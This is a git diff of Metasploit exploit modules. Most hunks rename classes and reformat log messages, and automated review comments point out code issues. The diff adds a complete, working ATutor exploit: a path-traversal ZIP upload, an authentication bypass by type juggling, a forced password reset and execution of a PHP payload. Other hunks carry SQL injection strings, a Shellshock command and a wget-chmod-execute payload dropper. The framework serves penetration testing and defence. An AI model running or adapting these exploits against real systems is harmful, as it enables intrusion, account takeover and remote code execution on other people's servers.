a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb +++ b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb index 033eee1c4e..3b5e5ebea2 100644 
--- a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Telnet diff --git a/modules/exploits/hpux/lpd/cleanup_exec.rb b/modules/exploits/hpux/lpd/cleanup_exec.rb index 0a2b902014..c4bbe2df1b 100644 --- a/modules/exploits/hpux/lpd/cleanup_exec.rb +++ b/modules/exploits/hpux/lpd/cleanup_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/irix/lpd/tagprinter_exec.rb b/modules/exploits/irix/lpd/tagprinter_exec.rb index b80a21d738..e07c08159b 100644 --- a/modules/exploits/irix/lpd/tagprinter_exec.rb +++ b/modules/exploits/irix/lpd/tagprinter_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/antivirus/escan_password_exec.rb b/modules/exploits/linux/antivirus/escan_password_exec.rb index d6236e994b..89a500c3ea 100644 --- a/modules/exploits/linux/antivirus/escan_password_exec.rb +++ b/modules/exploits/linux/antivirus/escan_password_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote def cmd_exec(session, cmd) case session.type when /meterpreter/ - print_warning("#{peer} - Use a shell payload in order to get root!") + print_warning("Use a shell payload in order to get root!") when /shell/ o = session.shell_command_token(cmd) o.chomp! if o 
@@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote @dropped_elf = rand_text_alpha(rand(5) + 3) command = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}" - print_status("#{peer} - Downloading the payload to the target machine...") + print_status("Downloading the payload to the target machine...") res = exec_command(command) if res && res.code == 302 && res.headers['Location'] && res.headers['Location'] =~ /index\.php\?err_msg=password/ register_files_for_cleanup(File.join(datastore['WRITABLEDIR'], @dropped_elf)) @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote command = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)};" command << File.join(datastore['WRITABLEDIR'], @dropped_elf) - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") exec_command(command, 1) end diff --git a/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb b/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb index 5e2674723a..a783d4ed8f 100644 --- a/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb +++ b/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/linux/ftp/proftp_sreplace.rb b/modules/exploits/linux/ftp/proftp_sreplace.rb index b5c8c3d0e8..33b1920d30 100644 --- a/modules/exploits/linux/ftp/proftp_sreplace.rb +++ b/modules/exploits/linux/ftp/proftp_sreplace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/linux/ftp/proftp_telnet_iac.rb b/modules/exploits/linux/ftp/proftp_telnet_iac.rb index 5891da9e62..fb7f6cf438 100644 
--- a/modules/exploits/linux/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/linux/ftp/proftp_telnet_iac.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking #include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/linux/games/ut2004_secure.rb b/modules/exploits/linux/games/ut2004_secure.rb index 569747d8a1..caa3c9a700 100644 --- a/modules/exploits/linux/games/ut2004_secure.rb +++ b/modules/exploits/linux/games/ut2004_secure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb b/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb index 6640a05340..45587d7b30 100644 --- a/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb +++ b/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb index 54a1b3bd45..609ad4d5e2 100644 --- a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb +++ b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
@@ -68,19 +68,19 @@ class Metasploit4 < Msf::Exploit::Remote 'uri' => '/cgi-bin/ping.sh' ) if !res - vprint_error("#{peer} - No response from host") + vprint_error("No response from host") return Exploit::CheckCode::Unknown elsif res.headers['Server'] =~ /Boa\/(.*)/ - vprint_status("#{peer} - Found Boa version #{$1}") + vprint_status("Found Boa version #{$1}") else - print_status("#{peer} - Target is not a Boa web server") + print_status("Target is not a Boa web server") return Exploit::CheckCode::Safe end if res.body.to_s.index('127.0.0.1 ping statistics') return Exploit::CheckCode::Detected else - vprint_error("#{peer} - Target does not appear to be an Advantech switch") + vprint_error("Target does not appear to be an Advantech switch") return Expoit::CheckCode::Safe end end @@ -90,7 +90,7 @@ class Metasploit4 < Msf::Exploit::Remote # def exploit cmd = cve_2014_6271(payload.encoded) - vprint_status("#{peer} - Trying to run command '#{cmd}'") + vprint_status("Trying to run command '#{cmd}'") res = send_request_cgi( 'method' => 'GET', 'uri' => '/cgi-bin/ping.sh', diff --git a/modules/exploits/linux/http/airties_login_cgi_bof.rb b/modules/exploits/linux/http/airties_login_cgi_bof.rb index 42232de7a8..d8f1c3b530 100644 --- a/modules/exploits/linux/http/airties_login_cgi_bof.rb +++ b/modules/exploits/linux/http/airties_login_cgi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -73,13 +73,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 100 
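Review bot: The final `else` branch of the first advantech_switch_bash_env_exec.rb hunk still returns `Expoit::CheckCode::Safe`, a misspelled constant that this commit leaves in place. When the server identifies as Boa but the body lacks the ping statistics string, the method will raise `NameError` instead of reporting Safe. Change it to `return Exploit::CheckCode::Safe`. The enclosing method begins above the hunk.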
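Review bot: In the airties_login_cgi_bof.rb hunk, the `fail_with` call below the changed `print_status` still builds `"#{peer} - Failed to access the vulnerable URL"` by hand, so status lines and failure messages are now formatted two different ways. The same leftover appears in the alienvault_sqli_exec.rb and astium_sqli_upload.rb hunks. If the print helpers now add the peer themselves (not visible in this diff), decide whether `fail_with` messages should keep the manual prefix. Either drop it, `fail_with(Failure::Unknown, 'Failed to access the vulnerable URL')`, or add a short comment saying that `fail_with` does not prefix the peer and the interpolation is intentional.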
diff --git a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb index e3a9832d88..19557b6ae7 100644 --- a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb +++ b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # Only interactive single commands supported include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/http/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb index 343ff95190..caafb37989 100644 --- a/modules/exploits/linux/http/alienvault_sqli_exec.rb +++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) " sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}" - print_status("#{peer} - Trying to grab admin session through SQLi") + print_status("Trying to grab admin session through SQLi") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'), 
@@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/ admin_session = $1 @cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*") - print_status("#{peer} - Admin session cookie is [ #{@cookie} ]") + print_status("Admin session cookie is [ #{@cookie} ]") else fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session") end @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Created Action [ #{action} ]") + print_status("Created Action [ #{action} ]") else fail_with(Failure::Unknown, "#{peer} - Action creation failed!") end @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/ @action_id = $1 - print_status("#{peer} - Action ID is [ #{@action_id} ]") + print_status("Action ID is [ #{@action_id} ]") else fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!") end @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/ policy_ctx = $1 policy_group = $2 - print_status("#{peer} - Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!") + print_status("Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!") else fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!") end @@ -216,7 +216,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Created Policy [ #{policy} ]") + print_status("Created Policy [ #{policy} ]") else fail_with(Failure::Unknown, "#{peer} - Policy creation failed!") end 
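Review bot: `print_status("Admin session cookie is [ #{@cookie} ]")` in the first alienvault_sqli_exec.rb hunk on this line prints a live administrator session identifier at normal verbosity. It will therefore end up in any console log or spooled output kept from the engagement, and those records then need to be handled as credentials. Consider moving the value to verbose output, `vprint_status("Admin session cookie is [ #{@cookie} ]")`, and keeping a neutral `print_status("Admin session retrieved")` at the default level. The enclosing method starts and ends outside the hunk.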
@@ -237,13 +237,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/ @policy_id = $1 - print_status("#{peer} - Policy ID [ #{@policy_id} ] retrieved!") + print_status("Policy ID [ #{@policy_id} ] retrieved!") else fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!") end # Reload the policies to make our new policy active - print_status("#{peer} - Reloading Policies") + print_status("Reloading Policies") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"), @@ -255,14 +255,14 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Policies reloaded!") + print_status("Policies reloaded!") else fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") end # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm. dont_exist = rand_text_alpha(8+rand(4)) - print_status("#{peer} - Triggering policy and action by requesting a non existing url") + print_status("Triggering policy and action by requesting a non existing url") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, dont_exist), @@ -270,7 +270,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 404 - print_status("#{peer} - Payload delivered") + print_status("Payload delivered") else fail_with(Failure::Unknown, "#{peer} - Payload failed!") end @@ -281,7 +281,7 @@ class Metasploit3 < Msf::Exploit::Remote def cleanup begin # Clean up, retrieve token so that the policy can be removed - print_status("#{peer} - Cleaning up") + print_status("Cleaning up") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"), 
@@ -291,9 +291,9 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/ token = $1 - print_status("#{peer} - Token [ #{token} ] retrieved") + print_status("Token [ #{token} ] retrieved") else - print_warning("#{peer} - Unable to retrieve token") + print_warning("Unable to retrieve token") end # Remove our policy @@ -309,9 +309,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Policy ID [ #{@policy_id} ] removed") + print_status("Policy ID [ #{@policy_id} ] removed") else - print_warning("#{peer} - Unable to remove Policy ID") + print_warning("Unable to remove Policy ID") end # Remove our action @@ -325,13 +325,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Action ID [ #{@action_id} ] removed") + print_status("Action ID [ #{@action_id} ] removed") else - print_warning("#{peer} - Unable to remove Action ID") + print_warning("Unable to remove Action ID") end # Reload the policies to revert back to the state before exploitation - print_status("#{peer} - Reloading Policies") + print_status("Reloading Policies") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"), @@ -343,7 +343,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Policies reloaded!") + print_status("Policies reloaded!") else fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") end diff --git a/modules/exploits/linux/http/astium_sqli_upload.rb b/modules/exploits/linux/http/astium_sqli_upload.rb index a721d59af2..5199a63285 100644 --- a/modules/exploits/linux/http/astium_sqli_upload.rb +++ b/modules/exploits/linux/http/astium_sqli_upload.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # Configuration is overwritten and service reloaded include Msf::Exploit::Remote::HttpClient @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect Astium") + vprint_status("Trying to detect Astium") res = send_request_cgi({ 'method' => 'GET', @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Access login page") + print_status("Access login page") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri), @@ -82,16 +82,16 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 302 and res.get_cookies =~ /astiumnls=([a-zA-Z0-9]+)/ session = $1 - print_good("#{peer} - Session cookie is [ #{session} ]") + print_good("Session cookie is [ #{session} ]") redirect = URI(res.headers['Location']) - print_status("#{peer} - Location is [ #{redirect} ]") + print_status("Location is [ #{redirect} ]") else fail_with(Failure::Unknown, "#{peer} - Access to login page failed!") end # Follow redirection process - print_status("#{peer} - Following redirection") + print_status("Following redirection") res = send_request_cgi({ 'uri' => "#{redirect}", 'method' => 'GET', @@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote pass = rand_text_alphanumeric(10) post_data = "__act=submit&user_name=#{sqli}&pass_word=#{pass}&submit=Login" - print_status("#{peer} - Using SQLi to bypass authentication") + print_status("Using SQLi to bypass authentication") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "/en", "logon.php"), 
@@ -151,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part(phppayload, "application/octet-stream", nil, "file; name=\"importcompany\"; filename=\"#{payload_name}\"") file = post_data.to_s - print_status("#{peer} - Uploading Payload [ #{payload_name} ]") + print_status("Uploading Payload [ #{payload_name} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "en", "database", "import.php"), @@ -168,8 +168,8 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup("/usr/local/astium/web/html/upload/#{payload_name}") - print_status("#{peer} - Requesting Payload [ #{uri}upload/#{payload_name} ]") - print_status("#{peer} - Waiting as the reloading process may take some time, this may take a couple of minutes") + print_status("Requesting Payload [ #{uri}upload/#{payload_name} ]") + print_status("Waiting as the reloading process may take some time, this may take a couple of minutes") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "upload", "#{payload_name}") @@ -178,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response...") + print_error("Unexpected response...") end end diff --git a/modules/exploits/linux/http/atutor_filemanager_traversal.rb b/modules/exploits/linux/http/atutor_filemanager_traversal.rb new file mode 100644 index 0000000000..ef74506ef1 --- /dev/null +++ b/modules/exploits/linux/http/atutor_filemanager_traversal.rb 
@@ -0,0 +1,360 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => 'ATutor 2.2.1 Directory Traversal / Remote Code Execution', + 'Description' => %q{ + This module exploits a directory traversal vulnerability in ATutor on an Apache/PHP + setup with display_errors set to On, which can be used to allow us to upload a malicious + ZIP file. On the web application, a blacklist verification is performed before extraction, + however it is not sufficient to prevent exploitation. + + You are required to login to the target to reach the vulnerability, however this can be + done as a student account and remote registration is enabled by default. + + Just in case remote registration isn't enabled, this module uses 2 vulnerabilities + in order to bypass the authentication: + + 1. confirm.php Authentication Bypass Type Juggling vulnerability + 2. 
password_reminder.php Remote Password Reset TOCTOU vulnerability + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'mr_me ', # initial discovery, msf code + ], + 'References' => + [ + [ 'URL', 'http://www.atutor.ca/' ], # Official Website + [ 'URL', 'http://sourceincite.com/research/src-2016-09/' ], # Type Juggling Advisory + [ 'URL', 'http://sourceincite.com/research/src-2016-10/' ], # TOCTOU Advisory + [ 'URL', 'http://sourceincite.com/research/src-2016-11/' ], # Directory Traversal Advisory + [ 'URL', 'https://github.com/atutor/ATutor/pull/107' ] + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + }, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Mar 1 2016', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']), + OptString.new('USERNAME', [false, 'The username to authenticate as']), + OptString.new('PASSWORD', [false, 'The password to authenticate with']) + ],self.class) + end + + def print_status(msg='') + super("#{peer} - #{msg}") + end + + def print_error(msg='') + super("#{peer} - #{msg}") + end + + def print_good(msg='') + super("#{peer} - #{msg}") + end + + def check + # there is no real way to finger print the target so we just + # check if we can upload a zip and extract it into the web root... + # obviously not ideal, but if anyone knows better, feel free to change + if (not datastore['USERNAME'].blank? and not datastore['PASSWORD'].blank?) 
+ student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], check=true) + if student_cookie != nil && disclose_web_root + begin + if upload_shell(student_cookie, check=true) && found + return Exploit::CheckCode::Vulnerable + end + rescue Msf::Exploit::Failed => e + vprint_error(e.message) + end + else + # if we cant login, it may still be vuln + return Exploit::CheckCode::Unknown + end + else + # if no creds are supplied, it may still be vuln + return Exploit::CheckCode::Unknown + end + return Exploit::CheckCode::Safe + end + + def create_zip_file(check=false) + zip_file = Rex::Zip::Archive.new + @header = Rex::Text.rand_text_alpha_upper(4) + @payload_name = Rex::Text.rand_text_alpha_lower(4) + @archive_name = Rex::Text.rand_text_alpha_lower(3) + @test_string = Rex::Text.rand_text_alpha_lower(8) + # we traverse back into the webroot mods/ directory (since it will be writable) + path = "../../../../../../../../../../../../..#{@webroot}mods/" + + # we use this to give us the best chance of success. If a webserver has htaccess override enabled + # we will win. If not, we may still win because these file extensions are often registered as php + # with the webserver, thus allowing us remote code execution. 
+ if check + zip_file.add_file("#{path}#{@payload_name}.txt", "#{@test_string}") + else + register_file_for_cleanup( ".htaccess", "#{@payload_name}.pht", "#{@payload_name}.php4", "#{@payload_name}.phtml") + zip_file.add_file("#{path}.htaccess", "AddType application/x-httpd-php .phtml .php4 .pht") + zip_file.add_file("#{path}#{@payload_name}.pht", "") + zip_file.add_file("#{path}#{@payload_name}.php4", "") + zip_file.add_file("#{path}#{@payload_name}.phtml", "") + end + zip_file.pack + end + + def found + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.txt"), + }) + if res and res.code == 200 and res.body =~ /#{@test_string}/ + return true + end + return false + end + + def disclose_web_root + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "jscripts", "ATutor_js.php"), + }) + @webroot = "/" + @webroot << $1 if res and res.body =~ /\\/(.*)jscripts\/ATutor_js\.php\<\/b\> / + if @webroot != "/" + return true + end + return false + end + + def call_php(ext) + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.#{ext}"), + 'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n" + }, timeout=0.1) + return res + end + + def exec_code + res = nil + res = call_php("pht") + if res == nil + res = call_php("phtml") + end + if res == nil + res = call_php("php4") + end + end + + def upload_shell(cookie, check) + post_data = Rex::MIME::Message.new + post_data.add_part(create_zip_file(check), 'application/zip', nil, "form-data; name=\"file\"; filename=\"#{@archive_name}.zip\"") + post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name=\"submit_import\"") + data = post_data.to_s + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, "mods", "_standard", "tests", "question_import.php"), + 'method' => 'POST', + 'data' => data, + 'ctype' => 
"multipart/form-data; boundary=#{post_data.bound}", + 'cookie' => cookie, + 'vars_get' => { + 'h' => '' + } + }) + if res && res.code == 302 && res.redirection.to_s.include?("question_db.php") + return true + end + # unknown failure... + fail_with(Failure::Unknown, "Unable to upload php code") + return false + end + + def find_user(cookie) + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "users", "profile.php"), + 'cookie' => cookie, + # we need to set the agent to the same value that was in type_juggle, + # since the bypassed session is linked to the user-agent. We can then + # use that session to leak the username + 'agent' => '' + }) + username = "#{$1}" if res and res.body =~ /(.*)<\/span>/ + if username + return username + end + # else we fail, because we dont know the username to login as + fail_with(Failure::Unknown, "Unable to find the username!") + end + + def type_juggle + # high padding, means higher success rate + # also, we use numbers, so we can count requests :p + for i in 1..8 + for @number in ('0'*i..'9'*i) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "confirm.php"), + 'vars_post' => { + 'auto_login' => '', + 'code' => '0' # type juggling + }, + 'vars_get' => { + 'e' => @number, # the bruteforce + 'id' => '', + 'm' => '', + # the default install script creates a member + # so we know for sure, that it will be 1 + 'member_id' => '1' + }, + # need to set the agent, since we are creating x number of sessions + # and then using that session to get leak the username + 'agent' => '' + }, redirect_depth = 0) # to validate a successful bypass + if res and res.code == 302 + cookie = "ATutorID=#{$3};" if res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*); ATutorID=(.*);/ + return cookie + end + end + end + # if we finish the loop and have no sauce, we cant make pasta + fail_with(Failure::Unknown, "Unable to exploit the type juggle and bypass authentication") + end + + def 
reset_password + # this is due to line 79 of password_reminder.php + days = (Time.now.to_i/60/60/24) + # make a semi strong password, we have to encourage security now :-> + pass = Rex::Text.rand_text_alpha(32) + hash = Rex::Text.sha1(pass) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "password_reminder.php"), + 'vars_post' => { + 'form_change' => 'true', + # the default install script creates a member + # so we know for sure, that it will be 1 + 'id' => '1', + 'g' => days + 1, # needs to be > the number of days since epoch + 'h' => '', # not even checked! + 'form_password_hidden' => hash, # remotely reset the password + 'submit' => 'Submit' + }, + }, redirect_depth = 0) # to validate a successful bypass + + if res and res.code == 302 + return pass + end + # if we land here, the TOCTOU failed us + fail_with(Failure::Unknown, "Unable to exploit the TOCTOU and reset the password") + end + + def login(username, password, check=false) + hash = Rex::Text.sha1(Rex::Text.sha1(password)) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "login.php"), + 'vars_post' => { + 'form_password_hidden' => hash, + 'form_login' => username, + 'submit' => 'Login', + 'token' => '', + }, + }) + # poor php developer practices + cookie = "ATutorID=#{$4};" if res && res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*); ATutorID=(.*); ATutorID=(.*);/ + if res && res.code == 302 + if res.redirection.to_s.include?('bounce.php?course=0') + return cookie + end + end + # auth failed if we land here, bail + unless check + fail_with(Failure::NoAccess, "Authentication failed with username #{username}") + end + return nil + end + + def report_cred(opts) + service_data = { + address: rhost, + port: rport, + service_name: ssl ? 
'https' : 'http', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + module_fullname: fullname, + post_reference_name: self.refname, + private_data: opts[:password], + origin_type: :service, + private_type: :password, + username: opts[:user] + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::SUCCESSFUL, + last_attempted_at: Time.now + }.merge(service_data) + + create_credential_login(login_data) + end + + def exploit + # login if needed + if (not datastore['USERNAME'].empty? and not datastore['PASSWORD'].empty?) + report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD']) + student_cookie = login(datastore['USERNAME'], datastore['PASSWORD']) + print_good("Logged in as #{datastore['USERNAME']}") + # else, we reset the students password via a type juggle vulnerability + else + print_status("Account details are not set, bypassing authentication...") + print_status("Triggering type juggle attack...") + student_cookie = type_juggle + print_good("Successfully bypassed the authentication in #{@number} requests !") + username = find_user(student_cookie) + print_good("Found the username: #{username} !") + password = reset_password + print_good("Successfully reset the #{username}'s account password to #{password} !") + report_cred(user: username, password: password) + student_cookie = login(username, password) + print_good("Logged in as #{username}") + end + + if disclose_web_root + print_good("Found the webroot") + # we got everything. Now onto pwnage + if upload_shell(student_cookie, false) + print_good("Zip upload successful !") + exec_code + end + end + end +end + +=begin +php.ini settings: +display_errors = On +=end diff --git a/modules/exploits/linux/http/belkin_login_bof.rb b/modules/exploits/linux/http/belkin_login_bof.rb index 2994ce4a32..d530c09c05 100644 --- a/modules/exploits/linux/http/belkin_login_bof.rb 
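Review bot: In `exploit`, `report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD'])` runs before `login` has confirmed the credentials, and `report_cred` stores the login with `Metasploit::Model::Login::Status::SUCCESSFUL`, so a wrong username or password is still written to the workspace as a working credential. Swap the two lines so the record is created only after `login` has returned, i.e. `student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'])` followed by the `report_cred(...)` call. The fallback branch changes the password of member id 1 through `reset_password` and nothing in the module restores it, so the Description should state that side effect, for example `Without USERNAME/PASSWORD this module resets the password of member_id 1 and does not restore it.` The overridden `print_status`/`print_error`/`print_good` also re-add the `#{peer} - ` prefix that the rest of this commit strips from other modules, which presumably prints the peer twice if the framework now adds it itself.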
